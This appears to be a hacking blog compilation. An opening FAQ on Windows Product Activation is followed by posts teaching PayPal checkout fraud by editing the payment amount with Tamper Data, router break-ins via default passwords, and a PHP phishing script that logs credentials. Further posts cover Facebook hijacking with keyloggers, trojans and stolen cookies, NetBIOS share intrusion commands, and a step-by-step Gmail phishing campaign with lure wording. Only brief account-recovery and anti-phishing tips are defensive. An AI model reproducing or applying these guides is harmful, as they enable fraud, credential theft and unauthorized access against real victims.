Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well.

WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.

In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.

Why activation?

Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.

What does “Genuine Windows” means?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.

What information does the Installation ID contain?

This Installation ID is a 50-digit number which is derived from the following two data.

1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.

2. Hardware ID – This value is derived based on the hardware configuration of your computer.

The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:

* Display Adapter
* SCSI Adapter
* IDE Adapter (effectively the motherboard)
* Network Adapter (NIC) and its MAC Address
* RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
* Processor Type
* Processor Serial Number
* Hard Drive Device
* Hard Drive Volume Serial Number (VSN)

Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.

The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.

However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.

What if a computer running a pirated copy of Windows attempts to activate?

The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:

During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.

Thus for a successful activation, either of the following two cases must be satisfied:

1. The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.

2. If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.

What is I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.

Some things WPA does not do

* WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
* If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
* WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
* WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity.


Posted by VdoCity 0 comments

Ever wanted a software program you had to buy online? Most of us have
and I will teach you how to do it cheap, and how to not get caught.

The Programs Are:

Mozilla Firefox
Tamper Data (Firefox Addon)
Torbutton (Firefox Addon)

Download all those programs, they can be found easily on google.

First thing first is to find a automatic Paypal system, this is very common among internet paypal sites that sell the warez that are not free.

Once you find something you want, remember the site.

Make a paypal account now, a new one even if you do have a old one, I would prefer to proxy all accounts you make and all accounts you log into just for safety reasons. To do this:

Run Vidalia, Start It
Run Privoxy, it will be in you notification area
Start Mozilla and at the bottom right hand corner you should see Tor Disabled in red letters, meaning you downloaded Torbutton correctly, just click the red letters once and they will turn green saying Tor Enabled, now your anonymized.

Create a account on paypal now, link it to your bank account, or use a Visa Giftcard, which is probably the safest way since I have yet to find a way to register a fake bank account to verify my account so I can use money. If you do find a way to make a fake bank account please tell me, but once someone figures out a safer way to do this step, you are going to have to take a risk of your paypal scam being linked to your bank account.

If the site that has your awesome **** on it requires registration to buy there items, also do this behind the proxy. Once you are logged in (if required) and you see the item you want with that tempting "Add to Cart" button, go to "Tools" and at the very bottom should be your addon Tamper Data. Run this, and click Start Tamper. Now go back to your site and click "Add to Cart" you should recieve popups from Tamper Data that give 3 Options, Tamper, Submit and Abort. Just click Tamper on every single cookie after you click "Add to Cart", because every online store sends the cookie with the info you need at different times. I have seen some that send it at the very end of checking out, so click Tamper on every cookie that you receive, until you see one cookie that stands out with way more parameters than any cookie you have seen so far, unless it was your first cookie of course. The cookie with tons of parameters, will have a parameter named "Amount" and the amount next to it should be the amount you paid in dollars, now just edit this parameter from whatever amount it was previously to 0.01

All the cookies after this can be submitted or you can stop Tamper Data, no cookies after this need to be viewed. Now once you hit whatever button on your site that is equal to Check Out that brings you to Paypal you will see on the Paypal site the amount has changed to 1 penny. Every single automatic service donation site item will now cost you a penny, I use a vista giftcard on my paypal account, so 100 dollars on a gift card is pretty much = to 1000 items you want for 1 penny.

P.S. I could not find any rules on "fraud" so if this is a post against the rules can you refrain from banning me and just delete the post =P


Posted by VdoCity 1 comments

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)

Step 2: First Get your ip from
Asume your IP to be 59.x.x.17

Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255

Step 4: Then check in your scanner which alive IPs has the port 80 open

Step 5: Enter that alive IP in your web browser

Step 6: It asks for user , pass
Type u
Password=admin or password
It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use ShowPassword or Revelation software to view the password in asterisks

Now You have Username/Password

Use Asterisk Key Software For Revelation Of Passwords.

Garena Features:

1- Enable all the icons
2-Enter room without Message box and advertisement
3-Show real ping number instead of bars ( in room, in game, someone joined ur game)
4-Enable message spam in chat channel
5-increase EXP 10 times, just left the garena open, you will be level up
6-Unlimit Group Alert even you are just a normal member
9-Build in 1.20e 1.21 1.24b/c 1.24d/e Maphack feature
12-trace people's ip address
15-auto update system to ensure your garena hack is always fit the lastest garena
16- you can leave room while playing
17 - you can view gamer's ladder record while you host or join a host
18 - you can change war3 name as what ever you want
19- can see gamer record in game& in room member list in both high level room & normal room
20 Can check win &lose rate
21 Can get ladder record in high level room

Dota Features:
22 CUSTOM KICK (kick him out or lag him out)
23 lag hacK(lag a certain player and dont affect the others)
24 mute hack u can mute a certain player
25 you can Read opponent team's chat
26 rune notifier : there will be a text message describe which rune spawned at where, and also a ping will be shown on the minimap with different color deponds on the rune type
27 maphack detector
28 resourse viewer in dota
29 be able to see kunkka's torrent, sniper's ulti, sb's charge etc during the game
30 mana bar
31 safeclick - the fog clicks will be protected from detection(even in replay)
32 show gray hp bar for invisible units
33 show enemy clicks
34 show hero lines
35 show cd in numbers
36 auto dodge for heros spells the list as the following


37 Auto Dodge the spell with Eul's scepter/ Blade Mail / Puck's 3rd spell / destoryer's 3rd spell ( auto cast to yourself if met the following spell,you can put these itemsl to any slot of your inventory)
Lina ulti
Lion Ulti
VS stun
Tide Ulti
EarthShaker Ulti
sandking stun
leoric stun
Naga web
Mangous Ulti
BladeMaster Ulti
Luna Ulti
Sven stun
Barathrum Ulti
Rooftrellen Ulti
Axe call
Destoryer Ulti
Azwraith first skill
Void Ulti
Zeus Ulti
Gondar First skill
Venomancer Ulti
Naga Ulti
Centuar stun
slardar stun
panda stun
ShadowFrench ulti
38 the following heros will use its skill rather than item to dodge the strikes

39 lock random seed
this feature is implemented for locking the random result in warcraft3 game,for example : -rd herolist, -sp player position, first rune spawning location and type etc etc
in order to use it
1 : you must be the host
2: you should set up a number on the random seed, if you set it to NULL then it will become real randoming
3 you should enable Hack function (ctrol+F8/F9) before you gose into a game


hi guys this a new section i am starting called "My account's hacked". Here i will be discussing what to do if your account is hacked.

i will begin with Google. it's a pity thing your account got hacked. in most cases it was you own fault that it got hacked. in rare cases i it the hacked who really did something . you should take care. Read more on how to prevent your self from getting hacked.

now coming back to the main discussion . you can do the following to once hacked.

Change password:- The first thing you need to do in case your account is hackedis change your password and all security details. in most cases the hacker doesn't has your password but cookies.So once you change it the problem is solved. In case you are not even able to log in use the following link to reset your password--->

Contact Google:- Once you have performed step one. immediately contact Google.You can use one of the forms based on your account type.You will be asked the exact creation date of your Google Account and also a copy of that original ?Google Email Verification? message. if you are lucky then only google will help you . In any case you will receive a reply from form them.

With Gmail id:- If you use a gmail id to login then use this form to contact google-->
Without Gmail id:- If your Google Accounts is not linked to Gmail i.e you dont use gmail id to login--> then use this form.

Inform all your buddies:- Send a mail to all your buddies informing them that your account has been hacked.Who know what the hacker might have done.

Always use safe practices

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.

This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it bacK.


Posted by VdoCity 0 comments

Select a target website and navigate to their login page.
Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
Create a PHP file and name it “phish.php”.
Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.
view sourceprint?
04.$handle = fopen("list.txt", "a");
06.foreach($_GET as $variable => $value) {
08.fwrite($handle, $variable);
09.fwrite($handle, "=");
10.fwrite($handle, $value);
11.fwrite($handle, "\r\n");
12.}fwrite($handle, "\r\n");
6. Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL. The HTML code should start with something like this: <*form action* ="””" method="”GET”"*>

7. Once everything is complete, upload the files to a free webhost that supports PHP.
8. That’s it! You’ve just created a phishing page.

UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.

Facebook is one of the most widely used Social Networking website by many teenagers across the world . most of them are now a days making the fake accounts both for abuse or maintaining secret relations. So, it’s no wonder many people want to know how to hack a Facebook account.
now i will show you some of the working and best ways to hack a Facebook account
now a days the security standards are greatly increased even the brute force attacks don’t work don’t get fooled there are so many people who try to fool the people by telling them to hack Facebook and any other service like orkut ,gmail,yahoo, orkut, there are only at most 5 ways to hack into these but newbie can at most use 3 types you must learn so much to try 4-5 ways and these 4-5 ways are almost have 99 % success rate
In this post i am going to discuss 3 fool proof methods and some intro abt the remaining 4th and 5th methods
The easy way to hack in to the Facebook account is through keyloggers
check this post i have covered all the topics about key loggers and using them to hack Facebook accounts
Hacking with Keyloggers :Topics covered
1. What is a keylogger?
2. Where to get the key logger programs and download links
3. How to install a keylogger
4.what to do when you don’t have the physical access
5. What to do target OR victim refuses to run the file?
6.Which is the best spying or keylogger soft
2. how to hack Facebook using the Trojan
This is same as the keyloggers if u want more control over the victom then u can use trojans (Rats) these are remote administrator tools which give the complete control over the victim system
check this post : how to use the trojans to hack Facebook
i covered full topics on using the trojans
1. What is a trojan?

2. Where to get the trojan programs and download links

3. How to install a trojan

4.what to do when you don’t have the physical access

5. What to do target OR victom refuses to run the file?

6.Which is the best trojans or rat software
PHISHING is the most commonly used method to hack into any web based systems like orkut ,gmail ,yahoo.
phishing is proved the best and easy way to hack into any web based system u can even hack into Facebook it has high success rate . And also there is no need of any scripting knowledge like html just upload the page to any free hosting accounts and send to the victim.
if u want the Facebook fake page go to here :
4-5 th method of hacking into Facebook
These methods are very complicated and canot be used by the new bies this involves finding the vonerabilities and exploiting them to gain the tool access
this has very high success rate the only difficult part is to find the ip of the victim
If you just wanna give a try these software : metasploit
6 : NEW Face book hacks
FBController – The Ultimate Utility to Control Facebook Accounts

You need to feed it biscuits (cookies) before you can do anything.
You can get the target’s cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, Scroogle search or however you like.
Once you have the cookies you can use FBController to have Full control over the target’s Facebook account.
Login to your Facebook account and sniff your own cookie OR collect a few live Facebook Biscuit/s of your Target/s.
Till now FBController version 1.0 uses your Target’s provided cookie and only :
A > Downloads the HomePage.
B > Allows you to Update the Target’s Wall and
C > Retrieve your Target’s Friend’s List
There are many APIs available to write apps and 3rd party Tools for FB in Java, Perl, .NET, etc.
FBConTroller was entirely written without knowing any of Facebook’s Dev API’s. Considering the above along with Facebook’s complexity, the next version might take some time to get released
You can download FBController here:
happy hacking


Posted by VdoCity 0 comments

If your victim possess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -

Click "Start -> Run -> cmd"

Type the following at the Dos Prompt


Nbtstat -A

[e.g: nbtstat -A]

This will give you a read out that looks like this

NetBIOS Remote Machine Name Table
Name Type Status
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered

The numbers in the <> are hex code values. What we are

interested in is the “Hex Code- number of <20>.

A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -

Net view \\

[e.g : net view \\]

You will then get a response that looks something like this.

Shared resources at \\ip_address
Sharename Type Comment

(The command was completed successfully.)

Net use x: \\\temp

[e.g : net use x: \\\temp]

If all goes well for you, you will then get a response of

(The command was completed successfully.)

Open my computer you will see your victim's temp folder there


Posted by VdoCity 1 comments

Hello Friends, Let's start this tutorial with some quotes " If you follow the Universe, the Universe will spoil you,So always make your own ways, let's other follow it and spoil themselves."
Today i will explain you How to hack Gmail account step by step. In my previous article i have explained you the basic technique involved in hacking Gmail account or password but not explained that in extended way but today i will disclose you how the hackers really hack the gmail account or gmail password using fake pages or simply called Phish pages and the technique involved is called Phising.[/COLOR][/SIZE]


Things that we will need:

1. Phish pages for Gmail Website.
2. A Free web hosting server to upload these fake pages.
3. An Email account for sending mails. ( create one fake email account for this as your account can be banned for doing such things).
4. HTML format mail that has to be sent to user ( you can post your email ID's below if you need the original version of this HTML mail. And please don't put your credentials in reply of this message).
Note: By using this hack i have hacked more than 5000+ accounts of gmail, yahoo, facebook, hotmail etc...As Hacking is my passion and i love to do it for fun. But friends i never misused this and hope that you will also not do that. As this tutorial is for Educational purposes and i and is not responsible if you have misused it.

Now friends first all you should know what is phishing and how it is done..

What is Phishing?
Phishing is a technique to hack passwords of any user by using phish pages. Now what are phish pages, in general, phish pages are the fake pages that look likes the same web page the only difference lies in the METHOD and ACTION codes. In original webpage you are directed to database to that website but in fake pages you are directed to program that writes the log file that consist of username and password of the user. In fake page method function directs you to a php program that writes the log and simultaneously it redirects to original website and copy the username in the username column of original website and it shows that you have entered a wrong password and when you enter the password again then you are entered into the original website. So the user will never know that his account has been hacked, he will only think that he has entered wrong password. So isn't its a good trick.

1. :::....DOWNLOAD...::: the phish pages ( fake pages for Gmail).

2. Now Extract the folder . After extracting you will get two folders namely:
a. ( For all countries)
b. (For Germany users)

3. Now open the folder. In this folder you will see three files namely:
a. gmail.html
b. mail.php
c. log.txt
Gmail.html is the phish page that looks like original Gmail page, when user enters his credentials i.e. username and password, then it will be redirected to write.php file which will write username and password to log file and simultaneously redirect the user to original website, that will show you have entered wrong password.

4. Now Create a fake Gmail account for sending mails and creating account on free web hosting server.
How to create Gmail account without Phone verification?
Its pity simple to create Gmail account without Phone verification. At the time when you create new account, when you choose email ID (i.e. username ), choose it as much as unique or absurd that you can. Now create the account , gmail will not ask you for phone verification.

5. Now when you have created the fake account for testing this hack, you have to configure this email account setting. Login to fake Gmail account and click on settings. Then go to Accounts and Import and then in front of Send Email as you will see edit info as shown in below snapshot.

6. Now You have to create account on free Web Hosting website. The website that i will use to explain is When you open the website there you will see a button "START UR WEBSITE" click on that. Now you will see new page there enter the credentials and create account. Then go to your fake email address and validate the account.

7. Now login into your account in and Now click on New Directory as shown below:

Then do as shown in this snapshot:

After confirming go back to main directory as shown:

Now double click on Gmail folder on that we have created in previous step. Now you will be inside the Gmail Directory. Then click on Upload button as shown is fig

Now after confirming the files upload go back to main Gmail directory. Now there you will see three files and click on the open in front of gmail.html file as shown below:

Now you will see the something awesome below:

[SIZE="3"][COLOR="Red"]8. Now we have created the fake page but its detectable. Let's make it more undetectable. For that go to the following website and copy the link in the URL box and Click on Next. As shown below:

[SIZE="3"][COLOR="Red"]Now after that enter domain name her like or gmail or anything similar to that as shown...

Now click Below to confirm as shown:

Now open the sample website you will see: (Click Here)

[SIZE="3"][COLOR="Red"]9. Now Creation Part is over, now we have our link that we will send to the user. Now How we will send it to user. Open your fake email account that you have created in step 5 and step 6. Click on Compose mail and In Subject Enter "Notice: Please Verify your Gmail Account" ( without quotes).
And in body write something like that we have seen illegal activity from your account. please verify your account within three days other we have to lock your email account. For verifying visit here and hyperlink link your fake mail address and send it to user.
If you want to get the Original Mail, post your Email ID below in comment. I will mail you the original mail directly to your email. We can't disclose it directly on website.

10. Now just wait one day or few hours till user enters his credentials.(depends how fast the user reacts to the email). Once the user logs in to his Gmail account using your Phisher, his user ID and password are ours..And these are stored in log.txt What you have to do is just refresh your Web hosting account files.

11. The Log.txt file will contain the passwords and look like this:

Thats all Now you have hacked the password of victim. I hope you all have Liked It.

There are other tricks to hack email accounts for this Click Here.

How to Protect Your Gmail Account From Phisher??
1. Always check the URL in the address bar before entering username and password.
2. Never follow any link from your email and any website until u have confirmed the Address bar URL.
3. Never Follow spam mails and "Win lottery or Cash" mails.